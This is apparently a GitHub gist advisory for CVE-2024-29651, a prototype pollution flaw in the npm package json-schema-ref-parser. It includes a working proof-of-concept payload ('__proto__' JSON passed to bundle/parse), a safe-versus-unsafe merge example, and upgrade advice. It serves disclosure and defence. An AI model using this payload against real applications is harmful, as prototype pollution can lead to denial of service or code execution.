@tariqhawis
Last active October 2, 2024 02:49
(CVE-2024-29651) Prototype Pollution vulnerability affecting @apidevtools/json-schema-ref-parser, versions 11.0.0, 11.1.0

Overview

json-schema-ref-parser is an NPM package for parsing, resolving, and dereferencing JSON Schema $ref pointers.

Affected versions of this package are vulnerable to Prototype Pollution. By passing specially crafted input to the affected functions, an attacker can manipulate the prototype of an object, potentially altering the behavior of every object that inherits from the affected prototype.

Details:

The vulnerable functions bundle(), parse(), resolve(), and dereference() pass the options argument to an unsafe merge method that recursively copies properties from one object to another. Such a function can modify any object reachable from the destination object, and the built-in Object.prototype is usually reachable through the special properties __proto__ and constructor.prototype. An attacker can therefore use one of these properties to pollute the application logic, which can escalate to denial of service, remote code execution, or cross-site scripting depending on how the application uses the polluted properties.

The call stack:

getNewOptions (@apidevtools/json-schema-ref-parser/dist/lib/options.js:80)
normalizeArgs (@apidevtools/json-schema-ref-parser/dist/lib/normalize-args.js:35)
$RefParser.parse (@apidevtools/json-schema-ref-parser/dist/lib/index.js:71)
Module.parse (@apidevtools/json-schema-ref-parser/dist/lib/index.js:138)

PoC:

(async () => {
  const lib = await import('@apidevtools/json-schema-ref-parser');
  // JSON.parse creates an own property literally named "__proto__"; the unsafe merge walks into it
  var BAD_JSON = JSON.parse('{"__proto__":{"polluted":true}}');
  var victim = {};
  console.log("Before Attack: ", JSON.stringify(victim.__proto__));
  try {
    // uncomment one at a time; each of the four entry points reaches the same merge
    lib.bundle({}, BAD_JSON, {});
    //lib.parse({}, BAD_JSON, {});
    //lib.resolve({}, BAD_JSON, {});
    //lib.dereference({}, BAD_JSON, {});
  } catch (e) { }
  // victim was never touched directly; the property now appears via Object.prototype
  console.log("After Attack: ", JSON.stringify(victim.__proto__));
  delete Object.prototype.polluted;
})();

Output:

Before Attack: {}
After Attack: {"polluted":true}

Mitigation

Upgrade the package to 11.2.0 or a newer version.

How to prevent:

To prevent your JavaScript code from becoming vulnerable to prototype pollution, refer to the recommendations listed in the Snyk.io article on the subject.
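The following is an added example, not code from this gist or from json-schema-ref-parser. It illustrates both the mechanism described under Details (a recursive merge that walks into the own "__proto__" key JSON.parse creates and so reaches Object.prototype) and the prevention guidance above, by placing a naive merge beside a hardened one and checking whether Object.prototype was touched. The function names (unsafeMerge, safeMerge, isPrototypePolluted, runPayload) and the payload are assumptions constructed for this demonstration.

```javascript
// Added example, not code from the gist or from json-schema-ref-parser.
// A naive recursive merge of the class the advisory describes, beside a
// hardened one, plus a check for pollution of Object.prototype.
// All names below are assumptions chosen for this demo.

// Keys through which an ordinary object can reach Object.prototype.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

const hasOwn = (obj, key) => Object.prototype.hasOwnProperty.call(obj, key);

// Naive deep merge. for..in yields the own "__proto__" key that JSON.parse
// creates, target["__proto__"] resolves (via the accessor) to Object.prototype,
// and the recursion then writes attacker-chosen properties onto it.
function unsafeMerge(target, source) {
  for (const key in source) {
    const value = source[key];
    if (value !== null && typeof value === 'object') {
      if (target[key] === null || typeof target[key] !== 'object') target[key] = {};
      unsafeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Hardened merge: skips the prototype-linking keys, copies only own
// properties, and allocates nested containers with a null prototype so the
// merged result itself never links back to Object.prototype.
function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (FORBIDDEN_KEYS.has(key)) continue;
    const value = source[key];
    if (value !== null && typeof value === 'object' && !Array.isArray(value)) {
      const existing = hasOwn(target, key) ? target[key] : undefined;
      const child = existing !== null && typeof existing === 'object'
        ? existing
        : Object.create(null);
      target[key] = safeMerge(child, value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Detection: report whether `name` has become an own property of Object.prototype.
function isPrototypePolluted(name) {
  return Object.prototype.hasOwnProperty.call(Object.prototype, name);
}

// Run one merge against a constructed payload of the shape shown in the PoC,
// record whether Object.prototype was polluted, then clean up so the check is repeatable.
function runPayload(mergeFn) {
  const payload = JSON.parse('{"__proto__":{"polluted":true}}'); // constructed input
  const merged = mergeFn({}, payload);
  const polluted = isPrototypePolluted('polluted');
  delete Object.prototype.polluted;
  return { polluted, mergedKeys: Object.keys(merged) };
}

console.log('unsafeMerge polluted Object.prototype:', runPayload(unsafeMerge).polluted);
console.log('safeMerge polluted Object.prototype:', runPayload(safeMerge).polluted);
```

The hardened version relies on three independent measures, any one of which already blocks the payload above: the key denylist, iterating Object.keys() instead of for..in, and null-prototype containers for nested values. Merges that also treat functions as mergeable targets additionally expose the constructor.prototype path, which is why "constructor" and "prototype" are on the denylist even though this particular naive merge overwrites the constructor slot instead of walking into it.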

References:

https://github.com/APIDevTools/json-schema-ref-parser/commit/8cad7f72c15b198f4d0b5b1c8a3a979b2e4baa82
https://gist.github.com/tariqhawis/5db76b38112bba756615b688c32409ad

@jayvdb

jayvdb commented Oct 2, 2024

Please see APIDevTools/swagger-parser#255 (comment) - I think the affected range goes back much further
